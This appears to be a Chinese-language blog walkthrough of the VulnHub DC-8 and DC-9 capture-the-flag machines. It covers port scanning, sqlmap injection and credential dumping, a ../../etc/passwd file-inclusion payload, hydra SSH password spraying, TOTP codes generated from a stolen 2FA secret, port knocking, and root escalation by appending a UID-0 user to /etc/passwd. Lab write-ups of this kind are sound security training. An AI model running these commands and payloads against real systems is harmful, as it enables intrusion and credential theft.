888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888






Hope you enjoyed DC-8.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.


I'm also sending out an especially big thanks to:


@4nqr34z
@D4mianWayne
@0xmzfr
@theart42


This challenge was largely based on two things:


1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42


The answer to that question is...


If you enjoyed this CTF, send me a tweet via @DCAU7.

2FA认证

作者在题目中提到了2FA(双因素认证)

简单的说就是要在认证的时候输入密码以及根据密钥动态生成的Verification code

已经拿到root，进行2FA实验

/var/log/auth.log：记录了所有与**身份验证（Authentication）**相关的事件。
.google_authenticator ：存储了该用户启用 Google Authenticator 时的密钥种子（Secret Key）。

通过/var/log/auth.log发现dc8user配置了2FA

在dc8user家目录得到了.google_authenticator

NRJWQLHCQYKWD27G2GW4XFBR7Q   <-- 1. 秘密密钥 (Secret Key)
" WINDOW_SIZE 17             <-- 2. 窗口大小 (允许的时间偏差)
" TOTP_AUTH                  <-- 3. 认证类型 (基于时间的一次性密码)
27017752                     <-- 4. 备用代码 (Scratch Code 1)
93723285                     <-- 5. 备用代码 (Scratch Code 2)
97959003                     <-- 6. 备用代码 (Scratch Code 3)
36240515                     <-- 7. 备用代码 (Scratch Code 4)

根据密钥生成验证码

1	`oathtool --totp -b NRJWQLHCQYKWD27G2GW4XFBR7Q`

从kali即可无需密码登录dc8user

输入Verification code

DC9

vulnhub dc9

https://www.vulnhub.com/entry/dc-9,412/

靶机IP

1	`192.168.1.12`

信息收集

1	`nmap -p- --min-rate 10000 192.168.1.12 -oN nmap/port.txt`

PORT   STATE    SERVICE
22/tcp filtered ssh
80/tcp open     http

1	`nmap -sT -sC -sV -O -p22,80 192.168.1.12 -oN nmap/detail.txt`

PORT   STATE  SERVICE VERSION
22/tcp closed ssh
80/tcp open   http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 08:00:27:75:01:28 (Oracle VirtualBox virtual NIC)
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 4.0 - 4.4 (92%), Linux 4.4 (92%), Linux 5.1 - 5.15 (91%), Linux 3.2 - 4.14 (89%), Linux 2.6.32 - 3.13 (89%), Linux 5.0 - 5.14 (89%), Linux 2.6.32 (88%), OpenWrt 19.07 (Linux 4.14) (88%), Linux 3.11 - 4.9 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

Web服务器: Apache/2.4.38
操作系统: Debian Linux 3.10 - 4.11
网页标题: “Example.com - Staff Details - Welcome”
端口:仅80开放

1	`dirsearch -u http://192.168.1.12 -i 200,301,302`

[04:55:30] 200 -    0B  - /config.php                 
[04:55:31] 301 -  310B  - /css  ->  http://192.168.1.12/css/        
[04:55:32] 200 - 1001B  - /display.php                                  
[04:55:35] 301 -  315B  - /includes  ->  http://192.168.1.12/includes/           
[04:55:35] 200 -  406B  - /includes/                              
[04:55:38] 302 -    0B  - /logout.php  ->  manage.php            
[04:55:38] 200 -  548B  - /manage.php                          
[04:55:46] 200 -  485B  - /search.php

1	`whatweb -v http://192.168.1.12`

WhatWeb report for http://192.168.1.12
Status    : 200 OK
Title     : Example.com - Staff Details - Welcome
IP        : 192.168.1.12
Country   : RESERVED, ZZ


Summary   : Apache[2.4.38], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)]


Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and 
        maintain an open-source HTTP server for modern operating 
        systems including UNIX and Windows NT. The goal of this 
        project is to provide a secure, efficient and extensible 
        server that provides HTTP services in sync with the current 
        HTTP standards. 


        Version      : 2.4.38 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/


[ HTML5 ]
        HTML version 5, detected by the doctype declaration 




[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 


        OS           : Debian Linux
        String       : Apache/2.4.38 (Debian) (from server string)


HTTP Headers:
        HTTP/1.1 200 OK
        Date: Wed, 25 Feb 2026 09:58:35 GMT
        Server: Apache/2.4.38 (Debian)
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 402
        Connection: close
        Content-Type: text/html; charset=UTF-8

SQL注入

search.php存在sql注入

sqlmap -r 1.txt --batch --dbs --level 3 --risk 3

[*] information_schema                                                   
[*] Staff                                                              
[*] users

1
2
3

sqlmap -r 1.txt --batch --level 3 --risk 3 -D users --tables

UserDetails

1	`sqlmap -r 1.txt --batch --level 3 --risk 3 -D users -T UserDetails --dump`

ID	姓氏 (Lastname)	密码 (Password)	注册日期 (Reg Date)	用户名 (Username)	名字 (Firstname)
1	Moe	`3kfs86sfd`	2019-12-29 16:58:26	marym	Mary
2	Dooley	`468sfdfsd2`	2019-12-29 16:58:26	julied	Julie
3	Flintstone	`4sfd87sfd1`	2019-12-29 16:58:26	fredf	Fred
4	Rubble	`RocksOff`	2019-12-29 16:58:26	barneyr	Barney
5	Cat	`TC&TheBoyz`	2019-12-29 16:58:26	tomc	Tom
6	Mouse	`B8m#48sd`	2019-12-29 16:58:26	jerrym	Jerry
7	Flintstone	`Pebbles`	2019-12-29 16:58:26	wilmaf	Wilma
8	Rubble	`BamBam01`	2019-12-29 16:58:26	bettyr	Betty
9	Bing	`UrAG0D!`	2019-12-29 16:58:26	chandlerb	Chandler
10	Tribbiani	`Passw0rd`	2019-12-29 16:58:26	joeyt	Joey
11	Green	`yN72#dsd`	2019-12-29 16:58:26	rachelg	Rachel
12	Geller	`ILoveRachel`	2019-12-29 16:58:26	rossg	Ross
13	Geller	`3248dsds7s`	2019-12-29 16:58:26	monicag	Monica
14	Buffay	`smellycats`	2019-12-29 16:58:26	phoebeb	Phoebe
15	McScoots	`YR3BVxxxw87`	2019-12-29 16:58:26	scoots	Scooter
16	Trump	`Ilovepeepee`	2019-12-29 16:58:26	janitor	Donald
17	Morrison	`Hawaii-Five-0`	2019-12-29 16:58:28	janitor2	Scott

同样的方式得到Staff数据库的两张表

StaffDetails

ID	邮箱	电话	姓氏	注册日期	名字	职位
1	mailto:marym@example.com	46478415155456	Moe	2019-05-01 17:32:00	Mary	首席执行官 (CEO)
2	mailto:julied@example.com	46457131654	Dooley	2019-05-01 17:32:00	Julie	人力资源
3	mailto:fredf@example.com	46415323	Flintstone	2019-05-01 17:32:00	Fred	系统管理员
4	mailto:barneyr@example.com	324643564	Rubble	2019-05-01 17:32:00	Barney	服务台
5	mailto:tomc@example.com	802438797	Cat	2019-05-01 17:32:00	Tom	司机
6	mailto:jerrym@example.com	24342654756	Mouse	2019-05-01 17:32:00	Jerry	仓储
7	mailto:wilmaf@example.com	243457487	Flintstone	2019-05-01 17:32:00	Wilma	会计
8	mailto:bettyr@example.com	90239724378	Rubble	2019-05-01 17:32:00	Betty	初级会计
9	mailto:chandlerb@example.com	189024789	Bing	2019-05-01 17:32:00	Chandler	销售总裁
10	mailto:joeyt@example.com	232131654	Tribbiani	2019-05-01 17:32:00	Joey	清洁工
11	mailto:rachelg@example.com	823897243978	Green	2019-05-01 17:32:00	Rachel	私人助理
12	mailto:rossg@example.com	6549638203	Geller	2019-05-01 17:32:00	Ross	讲师
13	mailto:monicag@example.com	8092432798	Geller	2019-05-01 17:32:00	Monica	市场营销
14	mailto:phoebeb@example.com	43289079824	Buffay	2019-05-01 17:32:02	Phoebe	助理清洁工
15	mailto:scoots@example.com	454786464	McScoots	2019-05-01 20:16:33	Scooter	驻场猫
16	mailto:janitor@example.com	65464646479741	Trump	2019-12-23 03:11:39	Donald	替补清洁工
17	mailto:janitor2@example.com	47836546413	Morrison	2019-12-24 03:41:04	Scott	助理替补清洁工

Users

UserID	Password	Username
1	856f5de590ef37314e7c3bdf6f8a66dc	admin

前面两个表的凭据均登不进去

破解admin的pass后得到

1	`admin:transorbital1`

成功登入

LFI

下面显示File does not exist，可能存在文件包含

1	`http://192.168.1.12/manage.php?file=../../../../etc/passwd`

得到passwd文件

密码喷洒

拿到可以登录的用户名，结合刚才得到的密码，尝试喷洒ssh，虽然前面显示22端口未开放，但还是可以试一下

1	`hydra -L name.txt -P pass.txt 192.168.1.12 ssh`

得到三组凭据

1
2
3

chandlerb:UrAG0D!
joeyt:Passw0rd
janitor:Ilovepeepee

挨个登录，最后在janitor家目录找到隐藏文件，发现密码本

1	`/home/janitor/.secrets-for-putin/passwords-found-on-post-it-notes.txt`

BamBam01
Passw0rd 
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

再次进行喷洒

得到另一组凭据

1	`fredf:B4-Tru3-001`

ssh登录后有sudo权限

1	`(root) NOPASSWD: /opt/devstuff/dist/test/test`

执行后发现test.py文件

test.py文件在/opt/devstuff/

#!/usr/bin/python

import sys

# 检查参数数量，需要正好3个参数（脚本名 + 源文件 + 目标文件）
if len(sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    # 打开第一个参数指定的文件（只读模式）
    f = open(sys.argv[1], "r")
    output = (f.read())  # 读取全部内容
    
    # 打开第二个参数指定的文件（追加模式）
    f = open(sys.argv[2], "a")
    f.write(output)  # 将读取的内容追加到文件末尾
    f.close()

可以追加文件，且是sudo权限，那么就可以修改passwd文件添加root用户

sudo提权

生成密码

1 2	`openssl passwd 123456 $1$pQ66hyxc$rTHGWGC/aQ0uW9JoEFtcY1`

写入文件

1	`echo 'hacker:$1$pQ66hyxc$rTHGWGC/aQ0uW9JoEFtcY1:0:0::/root:/bin/bash' >/home/fredf/1.txt`

写入passwd

1	`sudo /opt/devstuff/dist/test/test /home/fredf/1.txt /etc/passwd`

切换用户

1	`su hacker`

得到flag

███╗   ██╗██╗ ██████╗███████╗    ██╗    ██╗ ██████╗ ██████╗ ██╗  ██╗██╗██╗██╗
████╗  ██║██║██╔════╝██╔════╝    ██║    ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║     █████╗      ██║ █╗ ██║██║   ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║     ██╔══╝      ██║███╗██║██║   ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗    ╚███╔███╔╝╚██████╔╝██║  ██║██║  ██╗██╗██╗██╗
╚═╝  ╚═══╝╚═╝ ╚═════╝╚══════╝     ╚══╝╚══╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝╚═╝
                                                                             
Congratulations - you have done well to get to this point.

Hope you enjoyed DC-9.  Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.

I also want to send out a big thank you to the various members of @m0tl3ycr3w .

They are an inspirational bunch of fellows.

Sure, they might smell a bit, but...just kidding.  :-)

Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.

So long, and thanks for all the fish.

Knock 锁

看了wp才知道有Knock 锁

端口敲门(Port Knocking)是一种隐蔽技术，通过向特定端口发送特定序列的连接尝试（敲门），来动态打开防火墙上的某个端口（如SSH）。

但是刚才我并没有敲门，可能是无意中某个脚本已经成功敲门

手动敲门

找出敲门序列，使用LFI

1	`?file=../../../../etc/knockd.conf`

得到敲门序列

1	`7469,8475,9842`

使用knock工具

1 2	`apt install knockd knock 192.168.1.12 7469 8475 9842`

再次nmap扫描

1	`nmap -p- --min-rate 10000 192.168.1.12 -oN nmap/port.txt`

靶场

VulnHub DC

http://xiaowu5.cn/2026/02/25/VulnHub-DC/

作者

发布于

2026年2月25日

许可协议

BY XIAOWU

THM-Crocc Crew 下一篇